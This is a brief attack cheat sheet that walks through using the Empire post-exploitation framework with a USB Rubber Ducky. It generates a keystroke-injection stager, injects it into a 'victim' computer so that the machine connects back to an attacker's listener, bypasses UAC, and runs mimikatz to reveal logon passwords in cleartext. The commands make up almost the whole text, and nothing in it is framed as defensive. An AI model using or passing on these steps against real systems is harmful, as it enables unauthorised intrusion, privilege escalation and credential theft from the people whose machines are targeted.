Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate inject.bin file from code in ducky.txt at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4d. (Empire: agents) > interact FSDFSGAJ34FGH4
4e. (Empire: FSDFSGAJ34FGH4 ) > sysinfo
4f. (Empire: FSDFSGAJ34FGH4 ) > usemodule privesc/bypassuac
4g. (Empire: privesc/bypassuac ) > set Listener Listener01
4h. (Empire: privesc/bypassuac ) > run
4i. (Empire: privesc/bypassuac ) > back (enter twice)
4j. (Empire: agents) > list
4k. (Empire: agents) > interact DSGHFDFSGHJ243J
4l. (Empire: DSGHFDFSGHJ243J ) > usemodule credentials/
4m. (Empire: credentials/mimikatz/logonpasswords ) > run

If successful, logon passwords are now revealed in cleartext :)